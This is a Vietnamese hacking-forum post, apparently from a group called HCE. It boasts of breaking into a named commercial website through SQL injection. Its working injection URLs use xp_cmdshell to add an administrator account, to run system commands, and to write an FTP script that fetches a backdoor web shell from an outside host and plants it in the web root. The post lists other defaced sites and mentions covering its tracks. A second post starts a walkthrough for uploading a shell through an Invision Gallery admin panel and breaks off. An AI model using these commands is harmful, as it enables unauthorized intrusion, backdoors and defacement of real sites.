http://www.giftfulfillment.com/Prod.asp?id=290' Hực, dek "trúng xổ số" gồi , mừ lại đang cáu cái vụ nhìn nhầm đồng hồ đi học muộn 1 tiết, coi xem có zô đc hok or d3face cho bõ tức. Convert fát xem user: Code: http://www.giftfulfillment.com/Prod.asp?id=290%20and%201=convert(int,system _user) sp_password Hek, SA ~~> nghĩ ngay tới việc Add User & Remote nếu như thuận lợi Đầu tiên là lệnh add U/P kh0c_tham/123456 zô: Code: http://www.giftfulfillment.com/Prod.asp?id=290;exec%20master xp_cmdshell%2 0'net%20user%20kh0c_tham%20123456%20/add' sp_password Sau đó đưa kh0c_tham zô Admin group: Code: http://www.giftfulfillment.com/Prod.asp?id=290;exec%20master xp_cmdshell%2 0'net%20localgroup%20administrators%20kh0c_tham%20/add' sp_password Test thử xem add đc chưa fát nào: Đổ kq của cmd net user vào table hcrk Code: http://www.giftfulfillment.com/Prod.asp?id=290;drop%20table%20hcrk%20create %20table%20hcrk%20(id%20int%20identity,nd%20varchar(1000))%20insert%20i nto%20hcrk%20exec%20master xp_cmdshell%20'net%20user' sp_password Sau đó convert ra show hàng thoai Code: http://www.giftfulfillment.com/Prod.asp?id=290%20and%201=convert(int,(select %20top%201%20nd%20from%20hcrk%20where%20nd%20like%20('%25kh0c_t ham%25'))) sp_password Ok, add thành công gồi Trích: Syntax error converting the varchar value 'IUSR_6PY6L61 IWAM_6PY6L61 kh0c_tham ' to a column of data type int. H check ip coi sao, lại đổ kq ra thoai Code: http://www.giftfulfillment.com/Prod.asp?id=290;drop%20table%20hcrk%20create %20table%20hcrk%20(id%20int%20identity,nd%20varchar(1000))%20insert%20i nto%20hcrk%20exec%20master xp_cmdshell%20'ipconfig' sp_password Rùi convert thì được Code: http://www.giftfulfillment.com/Prod.asp?id=290%20and%201=convert(int,(select %20top%201%20nd%20from%20hcrk%20where%20nd%20like%20('%25Ip%20a ddress%25'))) sp_password Trích: Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 10.1.0.2 ' Hức, nhìn cái IP tới đây thấy nản. H upload backdoor lên đã: Backdoor e chuẩn bị trên 1 free host. Ok, tiếp tục nào. Ta sẽ chuẩn bị một kịch bản up file thông qua ftp tên là f.txt có nội dung như sau: Trích: open ftp.7host.com>>f.txt user kh0ctham xxxxx>>f.txt ascii>>f.txt get 6in1.asp>>f.txt quit>>f.txt H làm kịch bản này thui^^ Code: http://www.giftfulfillment.com/Prod.asp?id=290;exec master xp_cmdshell 'echo open ftp.7host.com>>f.txt'; sp_password http://www.giftfulfillment.com/Prod.asp?id=290;exec master xp_cmdshell 'echo user kh0ctham xxxxx>>f.txt'; sp_password Cứ thế chạy cho đến hết kịch bản. Xong rồi chạy lệnh ftp -v -i -n -s:f.txt để thực thi quá trình ftp Code: http://www.giftfulfillment.com/Prod.asp?id=290;exec master xp_cmdshell 'ftp -v - i -n -s:f.txt'; sp_password Waiting, chạy xong rồi, thế là đã có con shell trên server, h nó đang ở C:\Windows\system32 H ta fải tìm path của site kia để copy nó sang thì mới d3face đc chớ Quá trình tìm path của mình cũng tương tự như trên, đầu tiên run lệnh dir sau đó đổ kq vào file or tạo table mới. Nếu đổ ra file thì lại dùng ftp put ngược trở lại host của mình và vào view, còn nếu đổ ra table thì lại convert như khi tìm ip. Ở đây mình chọn cách đổ ra file Done, mình đã tìm được path của site kia trên server H copy cái con shell kia qua thôi Code: http://www.giftfulfillment.com/Prod.asp?id=290;exec master xp_cmdshell 'copy 6in1.asp xxxxxxxxxx'; sp_password Gồi, shell xong gồi, h đi dạo 1 vòng "local" và up file d3face.asp lên để kỷ niệm các em thôi. Việc up file này cũng làm y hệt như up shell thôi, ở đây mình hok del cái gì cả, cũng ko chơi index, chỉ gọi là để lại kỷ niệm Trích: http://www.mrts.net/d3fault.asp http://www.nsdinc.net/d3fault.asp http://www.giftfulfillment.com/d3fault.asp http://www.lowrespiratory.com/d3fault.asp http://www.jasonjkim.com/d3fault.asp http://www.surgecomponents.com/d3fault.asp Làm xong del hết mý cái file như là f.txt và 6in1.asp ở C:\Windows\system32. Còn chỗ log hẻm biêt ở đâu<fake ip rùi^_^> G4m3 0ver!! P/S:Bro nào viết cái tut cho niu bi ai bọn e về cái vụ Remote cái kh0c_tham(HCE) How I Up shell lên www.meteorwebdesign.net qua Invision Gallery Hôm nay xin trình bày anh em cách tôi Up shell lên Host qua Invision Gallery sau khi đã vào đc ACP. Đó cũng là cách mà lần trc tôi đã Up shell và Deface thằng www.meteorwebdesign.net ( > https://hcegroup.biz/forums/showthread.php?t=706) , cách up chẳng giống ai Sau khi đăng nhập vào ACP với pass của Admin , ta ấn vào mục Componels , vì Invision Gallery là 1 Componel của IBP nên mọi Setting của nó sẽ nằm trong đây [Hình] Trong Componels chọn Tools , Gallery Tools hiện ra ta vào tiếp from Zip file [Hình]